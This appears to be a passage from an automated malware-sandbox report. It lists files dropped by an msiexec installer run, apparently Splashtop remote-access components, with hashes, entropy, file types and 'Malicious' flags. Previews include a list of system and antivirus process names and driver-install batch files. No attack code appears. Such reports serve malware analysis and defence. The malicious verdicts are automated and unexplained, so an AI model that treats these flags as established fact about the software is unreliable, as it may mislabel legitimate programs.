                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):115208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.877996118531337
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Ojw9KC9FNiaL9tfuTjyUDJ90sFAmUPDo0hbn+F2LyvwFOs/cYb:b9KC9FNbwl9+D7o+XmIFOh4
                                                                                                                                                                                                                                                                                                                                  MD5:6B82A354476FA7C56175EE060F08E2C9
                                                                                                                                                                                                                                                                                                                                  SHA1:D77566D72C6F1C796C2E8087A9BD04920455B138
                                                                                                                                                                                                                                                                                                                                  SHA-256:754C8D6C7C91B7620A7EE34665C28F0BE67686591E5B49A7E9B8C33BAEF6C37E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E5241DCF50B4D6003FCF1FE14F8693CDE525CDF020E7CF7557B76AC954102722C7721BDE48DAE08A4524A12E611AF950588ADBEEBC95158901BCA6238CE2FA51
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):733704
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.921389042280339
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:SEjmVTsQGgZp4zjWURE9b9Sh73+axBJIsPqTVzVpW6jg6sQNGh+rIY2eV0Vt3Cz8:SEjmpsdgZwjWUREN9o91kV5pWmNGhM/q
                                                                                                                                                                                                                                                                                                                                  MD5:C0B530DCB39BFFA1B2A64DCB9DCE67CC
                                                                                                                                                                                                                                                                                                                                  SHA1:FC80610E9876B750B5C71CDBA679610320C3DF49
                                                                                                                                                                                                                                                                                                                                  SHA-256:A4103499C3584F3D2274E8D81B1355312D7CCF2CA794C746915ADA79C12F0D7D
                                                                                                                                                                                                                                                                                                                                  SHA-512:1326AD4B4EE3920E21449A0367E5912605AEAAF5C692A9042FEEBD2E4B789408DE605A7154D2DCD8A038358A98457312403C7AD550B3CDA64ED9D3E81E23459C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3835
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.764498295481361
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:y7IqsbCST8eInWhT2YB9tds0xNqu72V3VcaM/g7QSEvqcAzOt6zS:y7IuxeeS9VjiMl6e
                                                                                                                                                                                                                                                                                                                                  MD5:D949C968DFD291B7D69CD9A65A1CBC8A
                                                                                                                                                                                                                                                                                                                                  SHA1:9FD25344A4E35BE5F6FCC3CBD346D9230820016F
                                                                                                                                                                                                                                                                                                                                  SHA-256:D166064C6FFADBD505076B633E10D5536739C3E68E4B48F6A396FD8299666E56
                                                                                                                                                                                                                                                                                                                                  SHA-512:68C26A66AEE424CFEAF9A5BADFA2592DA91C5B1BE65B69C60879255936413215BDA05D5633F69C7AAD2688A53A586BB54E3AC722E2DCE3BFAC034C4C1C4594B4
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.svchost.exe..csrss.exe..SearchFilterHost.exe..SearchProtocolHost.exe..conhost.exe..winlogon.exe..SRServer.exe..SRService.exe..lsass.exe..services.exe..smss.exe..wininit.exe..lsm.exe..SSUService.exe..spoolsv.exe..SRFeature.exe..SearchIndexer.exe..WmiPrvSE.exe..mDNSResponder.exe..AppleMobileDeviceService.exe..nvvsvc.exe..DataProxy.exe..iPodService.exe..audiodg.exe..cmd.exe..spupnp.exe..WLIDSVC.EXE..WLIDSVCM.EXE..dllhost.exe..taskeng.exe..armsvc.exe..rundll32.exe..atieclxx.exe..atiesrxx.exe..ctfmon.exe..SeaPort.exe..nvxdsync.exe..MsMpEng.exe..nvSCPAPISvr.exe..wlanext.exe..LMS.exe..ccsvchst.exe..UNS.exe..mscorsvw.exe..msiexec.exe..iTunesHelper.exe..LSSrvc.exe..btwdins.exe..LogonUI.exe..TrustedInstaller.exe..avgwdsvc.exe..jusched.exe..unsecapp.exe..IAStorDataMgrSvc.exe..PnkBstrA.exe..AVGIDSAgent.exe..GoogleUpdate.exe..AvastSvc.exe..RTHDCPL.exe..sqlwriter.exe..IAANTmon.exe..avgcsrva.exe..mdm.exe..igfxsrvc.exe..Ati2evxx.exe..ZhuDongFangYu.exe..VSSVC.exe..wisptis.exe..hpqWmiEx.exe..avgcsrvx
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):326664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.273611352763876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:gpWGtJblMMuWntMAHeVQHe3lPpAyQ4L/8mJEDJnMihRD+ae7/lXCU:tGtJblMMuWntyxOyQ4LkIyxypCU
                                                                                                                                                                                                                                                                                                                                  MD5:D2A501F07C9F9373F11CC89FB2D49D8C
                                                                                                                                                                                                                                                                                                                                  SHA1:37EAADAF61D2CBE697F1C454640F9E04F4CD2D16
                                                                                                                                                                                                                                                                                                                                  SHA-256:A25A7C80A4BD007248306E02FBC10436885C64CC70A40433143BC82C641D3480
                                                                                                                                                                                                                                                                                                                                  SHA-512:B20727B34287D5877D94963B08F520E586C2A66A39631C768CF2F6ACA31959DFB2711C8043E71DA4FA8A00DF039E886D30B0D7DC2E85FEFC68E99761F3945B54
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):263688
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.578168733069161
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:rP7UBxcJ1Puvfk+GTVGUtO9EU5dem+b0sInsLwcQRelNXkd6X0ThhYibRYI:DhmE+YQY4/eHw5ew8N0A2Xbh
                                                                                                                                                                                                                                                                                                                                  MD5:F276DD195D935138FA1EDA9C522CD62C
                                                                                                                                                                                                                                                                                                                                  SHA1:67508C991FAE8F6A503B7997D96CE4BB7AF559CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:3E4FF68E9E2E312A9DDCD249F9BC2782103452E64CF6DF2914EF989006DD6EFA
                                                                                                                                                                                                                                                                                                                                  SHA-512:F3E2C301A7091D04F0D17BCDDC2BB0057366FE7089564966FE2EFD56ABD381190B01672DB6E6C7330E553382D38D7FEFDB644F1DF9F28B85714F52F695D812AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.463053305093135
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:NZ9Y9R9iY+Al8/ky6V9R9iYsrAl8/k5v+sv:0bMAl8j6vbirAl8mv+y
                                                                                                                                                                                                                                                                                                                                  MD5:20D8473FB148C4ADA5878B313BC776AF
                                                                                                                                                                                                                                                                                                                                  SHA1:1C88D93AED07AF5753D5CADE1BBA2EC1A69C81A8
                                                                                                                                                                                                                                                                                                                                  SHA-256:FAFFFA0C014BF46A71E323FC4275A5A9004FF90B474B1B7A30D5728FA81D3568
                                                                                                                                                                                                                                                                                                                                  SHA-512:5E6AD6B5F040C927685FB4BF4A83149DCDDB22F8A1BD5ECFF5B6E69ECAB80FA7DDAACFA4FA7EB35D9723F4CF364B96D61482FA805F5B6595AEDF064C3C099C2B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.M.a.n.i.f.e.s.t..... . . . .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s."..... . . . .x.m.l.n.s.:.w.i.n.=.".h.t.t.p.:././.m.a.n.i.f.e.s.t.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.w.i.n.d.o.w.s./.e.v.e.n.t.s."..... . . . .x.m.l.n.s.:.x.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.".>..... . .<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.>..... . . . .<.e.v.e.n.t.s.>......... . . . . . .<.p.r.o.v.i.d.e.r..... . . . . . . . . . .s.y.m.b.o.l.=.".P.r.o.v.i.d.e.r._.S.p.l.a.s.h.t.o.p.S.t.r.e.a.m.e.r._.S.t.a.t.u.s."..... . . . . . . . . . .n.a.m.e.=.".S.p.l.a.s.h.t.o.p.-.S.p.l.a.s.h.t.o.p. .S.t.r.e.a.m.e.r.-.S.t.a.t.u.s."..... . . . . . . . . . .m.e.s.s.a.g.e.=.".$.(.s.t.r.i.n.g...P.r.o.v.i.d.e.r...S.p.l.a.s.h.t.o.p.S.t.r.e.a.m.e.r._.S.t.a.t.u.s.)."..... . . . . . . . . . .g.u.i.d.=.".{.6.6.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7217591844595956
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:/xr44ok0H+Re/1EPaTHV8GzXlGmYOom+rt12xROVSjfCKm/kIKz0+rIOsJ:/24ok0H+Re/1EPaiI1Y4O6Sv+q
                                                                                                                                                                                                                                                                                                                                  MD5:29F288F751FBCEA5CD75EA9774882787
                                                                                                                                                                                                                                                                                                                                  SHA1:5A4C30382C63E29E848B681D39CC213C2198E12E
                                                                                                                                                                                                                                                                                                                                  SHA-256:711702EB24803788CE601996F90B7EF57EEF1F764F7AAF3A96E2196ED4A9533E
                                                                                                                                                                                                                                                                                                                                  SHA-512:B7FC0A739B33E79232EF506393CF90297F4D41F165F34B5BE50648D8A1967419E1F0EE369E809D5C142898824E8B5A3784106D33A2D1D72CD811D5352F4BBD60
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7214568392805565
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:xXxr44ok0H+Re/1EPaTHV8GzXlGmYOom+rt12xROVSjfCKm/kIKz0+rIOsJ:xX24ok0H+Re/1EPaiI1Y4O6Sv+q
                                                                                                                                                                                                                                                                                                                                  MD5:BE32CA6CD3810D278DC07C2D67FA5A44
                                                                                                                                                                                                                                                                                                                                  SHA1:63C47D24563F3E19BADE1482BA91D57542736C6C
                                                                                                                                                                                                                                                                                                                                  SHA-256:2F28F5D4952FD4430568AFCCE023C4885B47BF7C705950B252555C7D92EEFB72
                                                                                                                                                                                                                                                                                                                                  SHA-512:C21FF9E2116F0C469642C47B85E6D36970344F6C929B018DB6BED88FEFB54AA9C82EDDA1F9123F1B493E9046DE2B46C44C62900967752110EA056B54CEB56E85
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1458184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.608368260050606
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:3u1d1TlM6S5+KpPH2+68gJ4dxM3GsFa8cihBUbo0h3yT26:3ub1T2B/+J4jMWsFa8cJbo0h3x6
                                                                                                                                                                                                                                                                                                                                  MD5:86FB762B6F48E0F579D8E1C20D829E5C
                                                                                                                                                                                                                                                                                                                                  SHA1:35643C93BAF6F1A0DC2607C2F65D339DD149FE71
                                                                                                                                                                                                                                                                                                                                  SHA-256:1837087E75DE428C18ACEC7F2EF7576752396A3A1EF15450230734E9EE194B28
                                                                                                                                                                                                                                                                                                                                  SHA-512:A0A53F0C256DD1ED0FA512E11A4AB936BD829B22E37C422194144CF022192B2C7157A4220BAD2ABF45CA6FF44FA3E954BE57147E57CB869D1E53399F5895FB13
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1721576
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.978334410477683
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:oU4MsColC6Je/ZgY7OOfcEpiRLH87SyVXGe38uKUj+NFVov1PJLfVKZ8F5mEeZWF:BFCsfZRZA6Xn388avVovfLd+Mo4iEF
                                                                                                                                                                                                                                                                                                                                  MD5:4DA5DA193E0E4F86F6F8FD43EF25329A
                                                                                                                                                                                                                                                                                                                                  SHA1:68A44D37FF535A2C454F2440E1429833A1C6D810
                                                                                                                                                                                                                                                                                                                                  SHA-256:18487B4FF94EDCCC98ED59D9FCA662D4A1331C5F1E14DF8DB3093256DD9F1C3E
                                                                                                                                                                                                                                                                                                                                  SHA-512:B3D73ED5E45D6F2908B2F3086390DD28C1631E298756CEE9BDF26B185F0B77D1B8C03AD55E0495DBA982C5BED4A03337B130C76F7112F3E19821127D2CF36853
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15072
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.857603927715577
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yJaZmN9l0HNbsphoCqpQATeZjMcnYe+PjPGr9ZCApkT1rrZgjlerpLF+vctrie:kaZM0HlGOpQMejxnYPL/p1P6jeL3b
                                                                                                                                                                                                                                                                                                                                  MD5:3CDAE3B3A3AE968DB4756613EEFF3680
                                                                                                                                                                                                                                                                                                                                  SHA1:FF474C2D8A83BD5AF0A6B6CA954004D86BCF6FCA
                                                                                                                                                                                                                                                                                                                                  SHA-256:8DC9051BC452639550EC4F956F1DBBAC2D2A1886868C17743A3E4BE22297E166
                                                                                                                                                                                                                                                                                                                                  SHA-512:50E01496A3F891AC4BB455092427A4549406EAED44A292D415B8B42DF5FF72D1352EA6FCC66B2A11151AB9AE6590158753CC28E78F2DAC7FEBD5F6B8B4908126
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):21216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.105547248727277
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Zfhpq1BKeL/JQyyo0Y0HgWjkRtPzjn4nYPL/p1P6jeL3fq4:hhpq1BK8/JMYChMxXn4umiP
                                                                                                                                                                                                                                                                                                                                  MD5:A10A6FC3F643F82777345ADDC182799A
                                                                                                                                                                                                                                                                                                                                  SHA1:015BDFF614CD475C119C9CDC25950E8226930584
                                                                                                                                                                                                                                                                                                                                  SHA-256:8D09A7643A0095A0077710423E7D8D7134F9197B6F73DA427333790BA3774A61
                                                                                                                                                                                                                                                                                                                                  SHA-512:5D2D6FDCCB9A99F95467E734AC83C77162D5D4509248A4BFDCE493BDD9D140220416095E0F75DDAB50071850FC0892CED2835336D1C42F4A3AC87F0D66C41ED8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1461992
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.976326629681077
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:GjG90oN2lj11mk/22yYzGrarZRm4X5Uh6rVh5LdfBwOyCSQM1fFhSWRA2+:iGtN2h1120R7m4XShYVxfBwrC21fXSz
                                                                                                                                                                                                                                                                                                                                  MD5:A9970042BE512C7981B36E689C5F3F9F
                                                                                                                                                                                                                                                                                                                                  SHA1:B0BA0DE22ADE0EE5324EAA82E179F41D2C67B63E
                                                                                                                                                                                                                                                                                                                                  SHA-256:7A6BF1F950684381205C717A51AF2D9C81B203CB1F3DB0006A4602E2DF675C77
                                                                                                                                                                                                                                                                                                                                  SHA-512:8377049F0AAEF7FFCB86D40E22CE8AA16E24CAD78DA1FB9B24EDFBC7561E3D4FD220D19414FA06964692C54E5CBC47EC87B1F3E2E63440C6986CB985A65CE27D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):13024
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.821753253165571
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:hjJQAzeZjMpnYe+PjPGr9ZCApkT1rrZgjlerpLF+vctrMYPT:RJQUejknYPL/p1P6jeL32Y7
                                                                                                                                                                                                                                                                                                                                  MD5:C57099F9A63D144A9CDC103D2C42A6AC
                                                                                                                                                                                                                                                                                                                                  SHA1:F2AA1DBAC145BDA82DEDB69CA969EF4D0831C3DD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D8390287A8865769BB50B0B83E7E7FC56B055BFC48D3513146CDB8D3954338BE
                                                                                                                                                                                                                                                                                                                                  SHA-512:18AB1AB0D233AEAAB786A28AEF766AAD9C683859628AEE94527C426DE7F63171345CAB4ECF96C54F19C93DF5E637A4D845C2487049DE161E19229F6253C775E4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):224
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.711399671949434
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dCiIc+JIIbdCiIevKIIlfRcGIIbdELVKT7:kidCicjdCiMt/jdx7
                                                                                                                                                                                                                                                                                                                                  MD5:001B12FA9D827E2A53675F4FFC5D68D8
                                                                                                                                                                                                                                                                                                                                  SHA1:0D1221A35F3FEF1B8B0B38E835BFB8F35357D3AB
                                                                                                                                                                                                                                                                                                                                  SHA-256:2C6E538B58C32DFFC7E3ED85175A2F5D08C5AA3FA68EE05207DB6A015D778DD1
                                                                                                                                                                                                                                                                                                                                  SHA-512:E85BAD69B1F36D36B96A03713B885FDDC485E7DA5A5FA4B07F5AFD7264BC9989F4AEA14822588F3921EFF4C6C5E7D2737CD382866A089DA8F4A19CAF69BC3FF3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon.exe /r remove @HID\sthid* >> inst.log..utils\devcon.exe /r remove HID\sthid >> inst.log..utils\DIFxCmd.exe /u sthid.inf >> inst.log..utils\devcon.exe install sthid.inf HID\sthid >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.799817305367961
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dRLPIc+JIIbdRLPIevKIIlBRcGIIbdRL6VKT7:kiddcjddMr/jdD7
                                                                                                                                                                                                                                                                                                                                  MD5:4D969376976863ABA27CCF817EB97219
                                                                                                                                                                                                                                                                                                                                  SHA1:F65EA3234AFC4741F48AF51EE83280520969BF5A
                                                                                                                                                                                                                                                                                                                                  SHA-256:C62D9158C0807D0EE3225E13BAD307199AF61DF1659ADCA91E1361865C325EEE
                                                                                                                                                                                                                                                                                                                                  SHA-512:88F38ED5AD7FECDE209782D1111C142BE63AE54D73A71E737BEBC0FB1498D7988AC9EC0173DEF5F6E0A17192A5F802145E69BFDA606B253AFBFE23B5058A7413
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon64.exe /r remove @HID\sthid* >> inst.log..utils\devcon64.exe /r remove HID\sthid >> inst.log..utils\DIFxCmd64.exe /u sthid.inf >> inst.log..utils\devcon64.exe install sthid.inf HID\sthid >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.0656302139179195
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:5eMsGsZrVjbd/22z0yK2zFWQFyGZh4qnajA3vKkCTglckNVa:HsGsZr5pRpFRj0lo3CXkNk
                                                                                                                                                                                                                                                                                                                                  MD5:50BD9CFE7F724B3001FC833FF3FC284D
                                                                                                                                                                                                                                                                                                                                  SHA1:5A2D4C52C87170AFAE9F3F4DC75A81A046FF3EEB
                                                                                                                                                                                                                                                                                                                                  SHA-256:C7AE67C9A0669F2798ECA4452552F8F4919E2FB6D117ED290AC3F64966ECEEE0
                                                                                                                                                                                                                                                                                                                                  SHA-512:52CC8930BAC7CBE7AF9C2B64D8A3BCF874D76DDFA21691B3B47E4B5BE938BF42D1D0BF0B6BFA3EEEC61D81328B41FB608AC8DA5F278BF06C1AB294B0055FB3FF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4350
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.269640657392187
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:BmLnkrr4fzkQCmlCDHCMmDtu6KgbNHYFMDO:BmLny0fzkklCmBtu4NHBDO
                                                                                                                                                                                                                                                                                                                                  MD5:6580EDB5B8713F3BFD3DF983758A4EA3
                                                                                                                                                                                                                                                                                                                                  SHA1:1E6FC7E435A3C3E20E2CFF5356DED95CF0C7D0EB
                                                                                                                                                                                                                                                                                                                                  SHA-256:815FBD6C3BFAE5EA77ED77480FAAC1AFAE946D4BF109B95480C60030A83AE1B1
                                                                                                                                                                                                                                                                                                                                  SHA-512:EA332A77DBDCC2184B2154EF496DAE4C663075447EC4ACF61E83A5AAACCF702E2F0E0F6D7F91E4499993A9B9D7C3A9A21C495EEAD606E2F5EB5F4DF272A86928
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature="$CHICAGO$"..Class=HIDClass..ClassGuid={745a17a0-74d3-11d0-b6fe-00a0c90f57da}..Provider=%splashtop%..DriverVer=02/18/2013,1.0.0.5..CatalogFile=sthid.cat....[SourceDisksFiles]..sthid.sys = 99..hidkmdf.sys = 99....[SourceDisksNames]..99 = %DISK_NAME%,,,""....[SourceDisksNames.AMD64]..99 = %DISK_NAME%,,,\64bits....[DestinationDirs]..CopyFunctionDriver = 12 ....[Manufacturer]..%splashtop%=Vendor, NTx86, NTx86.6.1, NTAMD64, NTAMD64.6.1....; For XP and later..[Vendor.NTx86]..%splashtop.DeviceDesc% = sthid.Inst, HID\StHid....[Vendor.NTAMD64]..%splashtop.DeviceDesc% = sthid.Inst, HID\StHid....; For Win7 and later so that we can use inbox HID-KMDF mapper..[Vendor.NTx86.6.1]..%splashtop.DeviceDesc% = sthid.Inst.Win7, HID\StHid....[Vendor.NTAMD64.6.1]..%splashtop.DeviceDesc% = sthid.Inst.Win7, HID\StHid....;===============================================================..; sthid for XP thru Vista..;===========================================================
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.199619066707982
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:D+CpJmsGTJgbzPvaen0XUqcZzpV1DzjBnYPL/p1P6jeL3CX:B85e4+zpbXBumPX
                                                                                                                                                                                                                                                                                                                                  MD5:5904635A7888083EBB86C3A1218CB59B
                                                                                                                                                                                                                                                                                                                                  SHA1:69540333726CEF1EABD5B75D56822B36F9065840
                                                                                                                                                                                                                                                                                                                                  SHA-256:00648146272AF74EF5B1E74E83F58280FA1CC403621941AB3CB4E731756289F7
